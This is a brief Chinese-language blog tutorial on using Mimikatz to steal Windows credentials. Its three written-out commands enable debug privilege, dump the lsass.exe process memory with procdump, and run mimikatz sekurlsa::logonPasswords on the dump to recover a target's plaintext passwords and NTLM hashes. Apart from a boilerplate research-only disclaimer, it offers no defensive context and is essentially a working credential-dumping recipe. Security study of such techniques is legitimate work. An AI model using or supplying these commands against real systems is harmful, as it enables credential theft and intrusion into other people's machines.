Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具。
读取密码
1.以管理员身份运行
命令如下:
1 |
privilege::debug |
2.获取到 lsass.dmp 文件,然后在自己的环境下运行mimikatz这样就获取到目标密码。
命令如下:
1 |
procdump64.exe -accepteula -ma lsass.exe lsass.dmp |
获取到 lsass.dmp文件后可以用
1 |
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit |
来获取明文密码,最后的exit是运行完成之后停止,不然会一直运行下去
FROM :blog.cfyqy.com | Author:cfyqy
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论